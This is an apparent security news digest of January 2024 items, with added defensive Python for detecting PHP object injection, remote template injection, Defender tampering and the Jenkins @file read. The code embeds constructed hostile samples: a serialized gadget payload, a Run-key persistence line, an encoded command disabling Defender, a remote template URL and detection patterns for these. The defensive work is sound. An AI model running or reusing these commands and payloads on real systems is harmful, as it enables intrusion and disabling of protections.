Daily Brief

Find articles below, see 'DETAILS' for generated summaries

Total articles found: 12655

Checks for new stories every ~15 minutes

Title Summary
2024-01-25 18:30:08 bleepingcomputer DATA BREACH iPhone Apps Exploit Push Notifications to Harvest User Data
Numerous iOS apps are abusing push notifications to launch background processes that collect extensive device data without the user's consent. The Mysk mobile research duo showed how these apps circumvent Apple's background-execution restrictions to gather signals usable for fingerprinting and tracking. iOS briefly wakes an app in the background so it can process an incoming push notification, and the apps use that window to send device data back to their servers. Apps observed abusing this, including TikTok and Facebook, collect data points such as system uptime, locale, battery status and display brightness, which can be combined into a profile of the user. Apple plans to tighten the use of the APIs behind these device signals: starting in spring 2024, apps must declare an approved reason for calling them to remain on the App Store. Until that policy takes effect, users who want to avoid the collection are advised to disable push notifications for the app entirely, since merely muting them does not prevent the background launch. Separately, revelations from December showed that governments have requested push notification records from Apple and Google to monitor users, requests Apple says it was barred from disclosing.
Details
2024-01-25 15:51:26 bleepingcomputer CYBERCRIME Synacktiv Dominates Pwn2Own Tokyo, Exposes Flaws in Tesla’s Systems
Team Synacktiv earned $100,000 for chaining two zero-day vulnerabilities to compromise the Tesla Infotainment System, and a further $35,000 for a three-bug zero-day chain against Automotive Grade Linux. On the first day, Synacktiv had already earned $295,000 by rooting the Tesla Modem and hacking several EV charging stations. So far, contestants have demonstrated 48 unique zero-days and collected $1,101,500 in prizes. Vendors have 90 days to fix the reported vulnerabilities before Trend Micro's Zero Day Initiative publishes details. Pwn2Own Automotive 2024 is held alongside the Automotive World conference in Tokyo and focuses on vehicle and EV charger security, challenging participants to hack EV chargers, in-vehicle operating systems and infotainment systems, with a top prize of $200,000 and a Tesla car. The event follows Pwn2Own Vancouver 2023, where researchers earned $1,035,000 and a Tesla Model 3.
Details
2024-01-25 14:44:13 bleepingcomputer CYBERCRIME Cisco Issues Alert for Critical Security Flaw in Communication Products
Cisco has published a security advisory for a critical remote code execution (RCE) vulnerability affecting several Unified Communications Manager and Contact Center Solutions products. The flaw, tracked as CVE-2024-20253 and rated 9.9 out of 10, was reported by Synacktiv researcher Julien Egloff and allows an unauthenticated, remote attacker to execute arbitrary code on an affected device. An attacker exploits it by sending a specially crafted message to a listening port on a vulnerable device; successful exploitation gives command execution on the underlying operating system and potentially root access. Affected products are vulnerable in their default configuration and there is no workaround, so Cisco has released software updates. As an interim mitigation until updates can be applied, Cisco recommends access control lists (ACLs) on intermediary devices that restrict access to the affected components, and cautions administrators to assess, test and understand the impact of the mitigation before deploying it to avoid business disruption. At the time of the advisory, Cisco was not aware of any public exploit code or malicious exploitation of the vulnerability.
Details
2024-01-25 14:28:25 thehackernews MALWARE SystemBC Malware Analysis Uncovers Stealthy Payload Delivery
Cybersecurity researchers have analysed the command-and-control (C2) server infrastructure of the SystemBC malware. SystemBC is sold on underground marketplaces and lets attackers remotely control compromised hosts and deliver additional payloads. First seen in 2018, it is known for using SOCKS5 proxies to obfuscate network traffic and for maintaining persistent access for post-exploitation activity. The package sold to buyers includes executables for Windows and Linux, a PHP-based web panel for the C2 server and detailed instructions in several languages. The C2 server opens multiple TCP ports to handle C2 traffic, inter-process communication and the connections from each infected host. The PHP panel is simple but shows real-time information on active implants and lets operators run shellcode and arbitrary files on compromised machines. The same analysis covered an updated version of the DarkGate remote access trojan, in which the researchers identified a weakness in the custom Base64 alphabet it uses to encode exfiltrated data, allowing that data to be decoded. The findings help defenders understand and identify these threats and highlight the continuous evolution of malware techniques.
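A custom Base64 alphabet of the kind mentioned for DarkGate is a common trick, and decoding it is routine once the alphabet is known. The Python below is an added example written for this brief, not code from the researchers' analysis or from DarkGate. The alphabet it uses is a constructed rotation of the standard table, not DarkGate's real one. It decodes custom-alphabet Base64 by translating the symbols back to the standard alphabet, and it recovers the substitution table from known plaintext/ciphertext pairs, which is how an analyst turns one decoded sample into a decoder for all of them.

```python
import base64
import string

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"

# Constructed for illustration only: the standard table rotated by 17 positions.
# This is NOT DarkGate's real alphabet.
CUSTOM_ALPHABET = STD_ALPHABET[17:] + STD_ALPHABET[:17]


def _check_alphabet(alphabet: str, pad: str) -> None:
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must be 64 distinct characters")
    if len(pad) != 1 or pad in alphabet:
        raise ValueError("pad must be a single character outside the alphabet")


def custom_b64encode(raw: bytes, alphabet: str = CUSTOM_ALPHABET, pad: str = "=") -> str:
    """Encode with the standard codec, then swap in the custom symbols."""
    _check_alphabet(alphabet, pad)
    std = base64.b64encode(raw).decode("ascii")
    return std.translate(str.maketrans(STD_ALPHABET + "=", alphabet + pad))


def custom_b64decode(data: str, alphabet: str = CUSTOM_ALPHABET, pad: str = "=") -> bytes:
    """Map custom symbols back to the standard alphabet and decode strictly."""
    _check_alphabet(alphabet, pad)
    std = data.translate(str.maketrans(alphabet + pad, STD_ALPHABET + "="))
    std += "=" * (-len(std) % 4)          # tolerate samples with padding stripped
    return base64.b64decode(std, validate=True)


def recover_mapping(known_plain: bytes, observed: str) -> dict:
    """From one plaintext/ciphertext pair, learn which custom symbol stands for
    each standard Base64 symbol that occurs in the sample."""
    std = base64.b64encode(known_plain).decode("ascii")
    if len(std) != len(observed):
        raise ValueError("length mismatch: not a plain alphabet substitution")
    mapping = {}
    for s, o in zip(std, observed):
        if mapping.setdefault(s, o) != o:
            raise ValueError(f"inconsistent substitution for {s!r}")
    return mapping


def recover_alphabet(pairs) -> str:
    """Merge the mappings from several (plaintext, observed) pairs into a
    64-character alphabet; positions still unknown are filled with '?'."""
    table = {}
    for plain, obs in pairs:
        for s, o in recover_mapping(plain, obs).items():
            if table.setdefault(s, o) != o:
                raise ValueError(f"inconsistent substitution for {s!r}")
    return "".join(table.get(c, "?") for c in STD_ALPHABET)


if __name__ == "__main__":
    # Constructed "exfiltrated" sample, encoded with the constructed alphabet.
    plain = b"user=alice;host=WS01;clipboard=not a real secret"
    sample = custom_b64encode(plain)
    print(sample)
    print(custom_b64decode(sample))
    print(recover_alphabet([(plain, sample)]))
```

A single short sample only reveals the symbols it happens to use; feeding several known pairs into recover_alphabet fills in the rest, and any inconsistency between pairs is a sign that the encoding is not a simple alphabet substitution (for example a per-sample key).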
Details
2024-01-25 14:17:54 bleepingcomputer MALWARE WordPress Plugin Flaw Exploited by Hackers on 1 Million Sites
Hackers are exploiting a critical flaw in the 'Better Search Replace' WordPress plugin, which has more than one million active installations. The vulnerability, tracked as CVE-2023-6933, is a PHP object injection: the plugin deserializes untrusted input, so an unauthenticated attacker can inject a PHP object. WP Engine, the plugin's vendor, has released version 1.4.5 to fix the issue, which can lead to code execution, access to sensitive data or denial of service. The plugin itself contains no known property-oriented programming (POP) chain, so exploitation requires another installed plugin or theme that supplies one. Wordfence reports blocking more than 2,500 attacks exploiting this vulnerability in a single 24-hour period. The plugin has been downloaded close to half a million times in the past week, but how many installations have actually moved to the patched version is unclear. Users are urged to upgrade to version 1.4.5 immediately.
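Wordfence's blocking figure is a reminder of what a request-time check for PHP object injection has to do. The Python below is an added example written for this brief, not code from the plugin, WP Engine or Wordfence: a small parser for PHP's serialize() format that walks the structure and reports every object (O: and C: tokens) it would instantiate, including objects nested inside arrays, while ignoring the substring O: when it merely occurs inside a length-prefixed string, which a naive regex rule cannot tell apart. Both sample payloads and the class name Evil_POP are constructed. On the PHP side, the fix that removes this bug class is to call unserialize($data, ['allowed_classes' => false]) or to use JSON for untrusted input.

```python
import re

# Naive check of the kind a quick WAF rule would use: matches O:<n>:" anywhere,
# so it also fires on a harmless string that merely contains that text.
_NAIVE = re.compile(rb'[OC]:\d+:"')


def naive_object_check(raw: bytes) -> bool:
    return _NAIVE.search(raw) is not None


class PhpSerialParser:
    """Minimal parser for PHP serialize() output (N, i, d, b, s, a, O, C).
    Lengths in the format are byte counts, so the input is decoded as latin-1
    (one character per byte). References (r/R) and enums (E) are rejected."""

    def __init__(self, raw: bytes):
        self.s = raw.decode("latin-1")
        self.pos = 0
        self.classes = []          # class names of every object encountered

    def parse(self):
        value = self._value()
        if self.pos != len(self.s):
            raise ValueError(f"trailing data at offset {self.pos}")
        return value

    def _expect(self, lit: str) -> None:
        if not self.s.startswith(lit, self.pos):
            raise ValueError(f"expected {lit!r} at offset {self.pos}")
        self.pos += len(lit)

    def _until(self, ch: str) -> str:
        end = self.s.find(ch, self.pos)
        if end < 0:
            raise ValueError(f"unterminated token at offset {self.pos}")
        tok, self.pos = self.s[self.pos:end], end + 1
        return tok

    def _take(self, n: int) -> str:
        if n < 0 or self.pos + n > len(self.s):
            raise ValueError("declared length runs past end of input")
        tok, self.pos = self.s[self.pos:self.pos + n], self.pos + n
        return tok

    def _value(self):
        if self.pos >= len(self.s):
            raise ValueError("unexpected end of input")
        t = self.s[self.pos]
        self.pos += 1
        if t == "N":                       # N;
            self._expect(";")
            return None
        self._expect(":")
        if t == "i":                       # i:123;
            return int(self._until(";"))
        if t == "d":                       # d:1.5;
            return float(self._until(";"))
        if t == "b":                       # b:1;
            return self._until(";") == "1"
        if t == "s":                       # s:5:"hello";  quotes inside are data
            n = int(self._until(":"))
            self._expect('"')
            val = self._take(n)
            self._expect('";')
            return val
        if t == "a":                       # a:2:{key;value;key;value;}
            n = int(self._until(":"))
            self._expect("{")
            out = {}
            for _ in range(n):
                key = self._value()
                out[key] = self._value()
            self._expect("}")
            return out
        if t in "OC":                      # O:8:"Cls":1:{...}  /  C:8:"Cls":5:{raw..}
            n = int(self._until(":"))
            self._expect('"')
            cls = self._take(n)
            self._expect('":')
            self.classes.append(cls)
            count = int(self._until(":"))
            self._expect("{")
            if t == "C":                   # Serializable payload is opaque bytes
                self._take(count)
                self._expect("}")
                return {"__class__": cls}
            props = {}
            for _ in range(count):
                key = self._value()
                props[key] = self._value()
            self._expect("}")
            return {"__class__": cls, **props}
        raise ValueError(f"unsupported type tag {t!r} at offset {self.pos - 1}")


def find_php_objects(raw: bytes) -> list:
    """Return the class names of all objects a PHP unserialize() of `raw`
    would instantiate. Raises ValueError if `raw` is not valid serialized data."""
    p = PhpSerialParser(raw)
    p.parse()
    return p.classes


# Constructed samples: a harmless array whose string value merely contains "O:",
# and an array smuggling an object of a hypothetical gadget class.
BENIGN = b'a:2:{s:3:"key";s:5:"value";i:0;s:12:"O:1:"X":0:{}";}'
MALICIOUS = b'a:1:{s:7:"payload";O:8:"Evil_POP":1:{s:4:"file";s:9:"/tmp/x.sh";}}'
```

Blocking on find_php_objects() returning a non-empty list rejects exactly the inputs that would instantiate classes; the naive regex flags the benign sample too, which is the false-positive cost of pattern matching on a format that embeds arbitrary strings.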
Details
2024-01-25 14:02:10 theregister CYBERCRIME EquiLend Systems Taken Offline After Cyber Attack
EquiLend, a major US securities-lending platform, has taken systems offline after an unauthorized-access incident that is disrupting Wall Street securities-lending transactions. Restoring the systems is expected to take several days, with external cybersecurity firms assisting in the investigation and recovery. The attack was detected on January 22, 2024, and the company is operating manually in the meantime, which may reduce transaction speed and quality. The LockBit ransomware group has claimed responsibility and says it is negotiating with EquiLend. Manual operations typically raise costs and reduce performance but have a manageable impact on financial services. The incident comes shortly after EquiLend agreed to sell a majority stake to a private equity firm in a deal reportedly worth up to $700 million, and follows a run of high-profile breaches in the US financial industry at Fidelity National Financial, Mr Cooper and loanDepot.
Details
2024-01-25 12:04:03 thehackernews MALWARE Jenkins Patches Critical RCE Vulnerability - Immediate Update Recommended
Jenkins has fixed nine security issues, including a critical arbitrary file read vulnerability, tracked as CVE-2024-23897, that can be chained into remote code execution. The flaw is in the built-in command line interface (CLI): its command parser expands an argument of the form @<path> by replacing it with the contents of that file on the Jenkins controller, so an attacker who can pass arguments to a CLI command can read arbitrary files. Reading is limited for certain binary content because of character encoding. Attackers with "Overall/Read" permission can read entire files, while attackers without it can still read the first few lines, which is enough to leak secrets that enable further attacks. Jenkins has released fixes in 2.442 and LTS 2.426.3, which disable this parser feature by default, and advises disabling CLI access as a short-term mitigation where updating is not immediately possible. The discovery comes almost a year after Jenkins addressed another set of serious security issues. Users are urged to patch immediately.
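The @<path> expansion is easier to reason about as a model. The Python below is an added example written for this brief, not Jenkins or args4j code: it models the vulnerable parser behaviour (an argument beginning with @ is replaced by one argument per line of the named file) against a constructed in-memory filesystem, shows why an error message that echoes an unrecognised argument leaks the first line of any file the server can read, and shows that turning the expansion off (what the fixed releases do by default) closes the hole. The file paths and contents are constructed, and the dispatcher is a toy, not Jenkins' command handling.

```python
# Constructed in-memory filesystem standing in for the controller's disk.
# The contents are made up; nothing here is a real secret.
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "jenkins:x:1000:1000::/var/jenkins_home:/bin/sh\n",
    "/var/jenkins_home/secrets/master.key": "0123456789abcdef0123456789abcdef\n",
    "/var/jenkins_home/args/build.txt": "build\nnightly-job\n",
}

KNOWN_COMMANDS = {"help", "build", "who-am-i"}


def read_lines(path: str) -> list:
    try:
        return FAKE_FS[path].splitlines()
    except KeyError:
        raise FileNotFoundError(path) from None


def expand_at_files(args, at_syntax: bool = True, read=read_lines) -> list:
    """Model of the parser feature behind CVE-2024-23897. With at_syntax=True an
    argument '@<path>' is replaced by one argument per line of <path>, read with
    the server's privileges. With at_syntax=False (the behaviour of the fixed
    releases) '@' is just a character in an ordinary argument."""
    if not at_syntax:
        return list(args)
    out = []
    for a in args:
        if a.startswith("@") and len(a) > 1:
            out.extend(read(a[1:]))
        else:
            out.append(a)
    return out


def run_cli(argv, at_syntax: bool = True) -> str:
    """Toy dispatcher. Its error path echoes the unrecognised command name, so
    with at_syntax=True the first line of whatever file the caller named comes
    straight back to the caller, before any permission check on the command."""
    args = expand_at_files(argv, at_syntax=at_syntax)
    if not args:
        return "ERROR: no command given"
    if args[0] not in KNOWN_COMMANDS:
        return f"ERROR: No such command '{args[0]}'"
    return f"OK: {args[0]}"


if __name__ == "__main__":
    print(run_cli(["@/etc/passwd"]))                    # leaks the first line
    print(run_cli(["@/etc/passwd"], at_syntax=False))   # fixed: '@' is literal
    print(run_cli(["@/var/jenkins_home/args/build.txt"]))
```

The leak needs no command to succeed: the expansion happens before dispatch, and the failure message does the exfiltration. That is why the fix turns the feature off rather than trying to sanitise paths, and why disabling the CLI entirely is an effective stopgap.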
Details
2024-01-25 11:33:18 thehackernews MALWARE Enhanced LODEINFO Malware Targets Multiple Languages with Fileless Tactics
LODEINFO, an evolving fileless backdoor, has gained new anti-analysis techniques and remote code execution features. It is distributed through spear-phishing campaigns that originally targeted Japanese entities but now also accommodate a broader set of Microsoft Office language settings. The attacks, attributed to the Chinese nation-state actor Stone Panda (APT10), deliver LODEINFO through malicious Microsoft Word macros. Recent versions use remote template injection, so the document fetches its macro-bearing template from an attacker-controlled server when opened, and check the Office language setting before proceeding. LODEINFO version 0.7.1 adds an intermediate stage that downloads a file disguised as a PEM (Privacy-Enhanced Mail) certificate, which then loads the backdoor into memory. These techniques underline the need for memory-scanning detection to catch fileless malware.
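Remote template injection leaves a recognisable trace in the document itself: a relationship in word/_rels/settings.xml.rels of type attachedTemplate whose Target is external and points at a remote URL instead of a local .dotm path. The Python below is an added example written for this brief, not code from the researchers or from the campaign: it builds a minimal constructed .docx in memory with such a relationship and then inspects the archive for it. It goes slightly beyond the case in the article by flagging any external relationship target with a remote scheme in any .rels part, which also catches related tricks such as remote OLE links. The server address in the sample is a documentation (TEST-NET) address.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = f"{{{REL_NS}}}Relationship"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
REMOTE_SCHEMES = {"http", "https", "ftp", "file", "mhtml"}


def _is_remote(target: str) -> bool:
    """UNC paths and remote URL schemes leave the machine; a local path or a
    Windows drive letter (parsed by urlsplit as a one-letter 'scheme') does not."""
    if target.startswith("\\\\") or target.startswith("//"):
        return True
    return urlsplit(target).scheme.lower() in REMOTE_SCHEMES


def find_remote_relationships(docx_bytes: bytes) -> list:
    """Return (rels part, relationship type suffix, target) for every external
    relationship in the package whose target points off the local machine."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(REL_TAG):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and _is_remote(target):
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, kind, target))
    return hits


def has_remote_template(docx_bytes: bytes) -> bool:
    """True when the document will fetch its template (and any macros in it)
    from a remote location at open time: the remote template injection pattern."""
    return any(kind == "attachedTemplate" for _, kind, _ in find_remote_relationships(docx_bytes))


def build_sample_docx(template_target=None) -> bytes:
    """Constructed minimal .docx with just the parts involved in the template
    link. With template_target set, settings.xml.rels carries the link."""
    rels = f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">'
    settings = f'<?xml version="1.0" encoding="UTF-8"?><w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}">'
    if template_target:
        rels += (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                 f'Target="{template_target}" TargetMode="External"/>')
        settings += '<w:attachedTemplate r:id="rId1"/>'
    rels += "</Relationships>"
    settings += "</w:settings>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   f'<?xml version="1.0"?><w:document xmlns:w="{W_NS}"><w:body/></w:document>')
        z.writestr("word/settings.xml", settings)
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    print(find_remote_relationships(build_sample_docx("http://203.0.113.10/template.dotm")))
    print(find_remote_relationships(build_sample_docx()))
```

A legitimate corporate template attached from a local path also uses TargetMode="External", which is why the check is on the target's scheme rather than on the mode alone. When running this over untrusted documents, parse the XML with a hardened parser such as defusedxml rather than the stock xml.etree module.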
Details
2024-01-25 11:22:43 thehackernews CYBERCRIME Axur Report Unveils Rising Cyber Threats and AI's Role in 2023/2024
The Axur Threat Landscape Report 2023/2024 reports a significant increase in cyberattacks and argues that cyber risk has become business risk, urging organizations to revamp their security strategies. Geopolitical tensions such as the Russia-Ukraine conflict are shaping cybercriminal tactics. Ransomware groups increasingly prioritize data exposure over encryption, raising victims' exposure to data-breach fines. AI is being used for more sophisticated scams, including deepfake videos and automated social engineering. The report notes a threefold increase in leaked credit and debit card details, while credential leaks remained stable in volume but shifted in their sources. Axur stresses brand protection, citing increased detection of brand misuse and new fraud tactics such as "apphishing", and presents its takedown capability and response times as key to mitigating threats. Its deep and dark web monitoring points to a need for continuous monitoring and rapid response. Axur also introduces Polaris, an AI-powered threat management tool intended to streamline threat intelligence and speed up organizational response.
Details
2024-01-25 10:11:06 thehackernews NATION STATE ACTIVITY China-Aligned APT Hijacks Software Updates with "NSPX30" Spyware
A China-aligned APT group that ESET tracks as Blackwood has been hijacking legitimate software updates to deliver the "NSPX30" implant, and has been active since at least 2018. Targets are mainly manufacturing, trading and engineering companies in China, Japan and the UK, along with individuals in those regions. NSPX30 is a multi-component implant designed to hide its infrastructure and to bypass several Chinese antivirus products. Its lineage goes back to a backdoor called Project Wood from 2005 and has evolved through several iterations. Delivery relies on adversary-in-the-middle interception of unencrypted HTTP update requests made by legitimate software, which are answered with the malicious download; ESET suspects compromised network appliances such as routers are used to do this, although the exact mechanism remains unclear. Once deployed, the NSPX30 orchestrator downloads a backdoor that can collect files, open a reverse shell, terminate processes, log keystrokes and uninstall itself. The recently reported Volt Typhoon activity shows the same trend of attackers leveraging outdated network infrastructure for espionage and data exfiltration.
Details
2024-01-25 07:22:50 thehackernews MALWARE New CherryLoader Malware Mimics Legitimate Application to Deliver Privilege Escalation Exploits
A newly discovered malware loader, CherryLoader, poses as the legitimate CherryTree note-taking app and is used to deploy privilege escalation exploits on compromised hosts. Arctic Wolf Labs observed the loader in two intrusions, where it dropped the public privilege escalation tools PrintSpoofer or JuicyPotatoNG. CherryLoader is modular, so operators can swap in a different exploit without recompiling the loader. Its initial distribution method is unknown, but the observed attack chains started from a RAR archive hosted on a specific IP address. The loader runs its payload with process ghosting, an evasion technique in which the payload is written to disk, mapped into an image section and deleted again before the process is created from that section, so file-based scanners such as Microsoft Defender never get to inspect a file backing the running process. After privilege escalation succeeds, the malware establishes persistence with a batch script that also attempts to disable Microsoft Defender. Researchers describe CherryLoader as a sophisticated multi-stage downloader that uses encryption and anti-analysis techniques to deploy public privilege escalation exploits stealthily.
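The batch-file stage that turns off Defender is the noisiest part of this chain and the easiest to write a detection for. The Python below is an added example written for this brief, not Arctic Wolf's analysis code or anything from CherryLoader: it scans a script for Defender-tampering and Run-key persistence commands, first decoding any PowerShell -EncodedCommand argument (Base64 of UTF-16LE text), since the plain-text patterns would otherwise miss an encoded command. The sample script and its file paths are constructed; the Set-MpPreference, Add-MpPreference, sc and reg commands it matches are real Windows tooling.

```python
import base64
import re

# (label, regex) pairs a defender would key on in a batch or PowerShell script.
TAMPER_PATTERNS = [
    ("defender_disable_pref",
     re.compile(r"Set-MpPreference\b[^\n]*-Disable\w+", re.I)),
    ("defender_exclusion",
     re.compile(r"Add-MpPreference\b[^\n]*-Exclusion(?:Path|Process|Extension)", re.I)),
    ("defender_service_stop",
     re.compile(r"\bsc(?:\.exe)?\s+(?:stop|config)\s+WinDefend\b", re.I)),
    ("defender_registry",
     re.compile(r"\breg(?:\.exe)?\s+add\b[^\n]*Windows Defender[^\n]*DisableAntiSpyware", re.I)),
    ("run_key_persistence",
     re.compile(r"\breg(?:\.exe)?\s+add\b[^\n]*\\CurrentVersion\\Run\b", re.I)),
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(line: str) -> str:
    """Replace a -EncodedCommand argument by its decoded UTF-16LE text so the
    plain-text patterns can see it. Leaves the line alone if decoding fails."""
    m = ENCODED_CMD.search(line)
    if not m:
        return line
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return line
    return line[:m.start()] + decoded + line[m.end():]


def scan_script(text: str) -> list:
    """Return (line number, label) for every line that matches a pattern,
    after decoding any encoded PowerShell argument on that line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        candidate = decode_encoded_command(line)
        for label, pattern in TAMPER_PATTERNS:
            if pattern.search(candidate):
                hits.append((lineno, label))
                break
    return hits


def _encode_ps(cmd: str) -> str:
    """Produce the argument form powershell -EncodedCommand expects."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed sample in the style of a post-exploitation batch file.
SAMPLE_SCRIPT = "\n".join([
    "@echo off",
    "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d C:\\Users\\Public\\u.exe /f",
    "powershell -ep bypass -enc " + _encode_ps("Set-MpPreference -DisableRealtimeMonitoring $true"),
    "powershell Add-MpPreference -ExclusionPath C:\\Users\\Public",
    "echo done",
])

if __name__ == "__main__":
    for lineno, label in scan_script(SAMPLE_SCRIPT):
        print(f"line {lineno}: {label}")
```

The same patterns translate directly into process-creation telemetry rules (command-line fields of Sysmon event 1 or Defender's own DeviceProcessEvents), where decoding the encoded argument before matching is just as necessary.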
Details
2024-01-25 05:56:15 thehackernews NATION STATE ACTIVITY Russian APT29 Group Compromises Hewlett Packard Enterprise Email Systems
Russian state-linked hackers known as APT29 infiltrated Hewlett Packard Enterprise's (HPE) cloud email environment and exfiltrated data. The breach, disclosed by HPE in an SEC filing, involved unauthorized access to mailboxes of personnel in cybersecurity and other key functions. The intrusion is believed to have begun in May 2023 and went undetected for over six months; HPE was notified on December 12, 2023. The same group is believed to have carried out a similar attack on Microsoft's corporate email systems in November 2023. HPE links the incident to an earlier event, also attributed to APT29, in which SharePoint files were exfiltrated as early as May 2023; HPE was alerted to that activity in June 2023. HPE says the breach has not materially affected its operations, although the extent of the theft has not been disclosed. APT29 is linked to Russia's SVR foreign intelligence service and is known for high-profile operations including the 2016 DNC hack and the 2020 SolarWinds supply-chain compromise.
Details
2024-01-25 02:06:48 theregister NATION STATE ACTIVITY HPE Confirms Cozy Bear's Infiltration of Its Cloud Email Services
Hewlett Packard Enterprise (HPE) disclosed that the suspected Russian state group Cozy Bear breached its cloud email system. The malicious activity began in May 2023; HPE first detected related activity in June 2023, but the initial containment evidently did not end the intrusion. Cozy Bear, also known as Midnight Blizzard, accessed and exfiltrated data from a small number of HPE mailboxes belonging to staff in cybersecurity, sales and other business functions. HPE says it immediately investigated, contained and remediated the breach and has eradicated the intrusion. HPE does not expect the incident to materially affect its operations or financial outlook, and its share price was stable after the announcement, suggesting investors regard such breaches as an expected risk for technology companies. The breach raises questions about the security of major tech companies' own environments, especially as Microsoft and HPE both disclosed breaches by the same group within the same week.
Details
2024-01-25 00:24:57 theregister NATION STATE ACTIVITY US Court Advances Apple's Lawsuit Against Spyware Maker NSO
A US judge has refused to dismiss Apple's lawsuit against NSO Group over the deployment of its Pegasus spyware on Apple devices. Apple accuses NSO of violating the US Computer Fraud and Abuse Act (CFAA) and other laws; with the motion to dismiss denied, NSO must respond to the allegations by February 14. Pegasus gave its operators unauthorized access to victims' phone calls, messages, cameras and microphones, and NSO has faced US sanctions and accusations that its customers used the spyware against journalists and activists. The court found that the losses Apple alleges fall within the CFAA's definition of loss. Apple continues to counter spyware with new security features and grants to civil society groups, while NSO says it will keep fighting the case, maintaining that its technology is vital for law enforcement and public safety.
Details
2024-01-24 21:51:54 bleepingcomputer NATION STATE ACTIVITY Russian State-Sponsored Hackers Infiltrate HPE Email System
HPE disclosed that Russian state-sponsored hackers tracked by Microsoft as Midnight Blizzard accessed its Office 365 email environment, targeting members of its cybersecurity team among others. Midnight Blizzard, believed to be part of Russia's SVR, is attributed with numerous attacks including the 2020 SolarWinds supply-chain compromise. According to the SEC filing, the hackers exfiltrated data from HPE mailboxes beginning in May 2023, and HPE's investigation links the activity to an earlier breach of its SharePoint server in May 2023. HPE activated its cyber response process on discovery and is working with external cybersecurity experts and law enforcement to investigate and mitigate the breach. The company reports no operational impact and does not anticipate a material financial impact. The HPE breach follows a separate but potentially similar incident in which Midnight Blizzard stole data from Microsoft corporate email accounts.
Details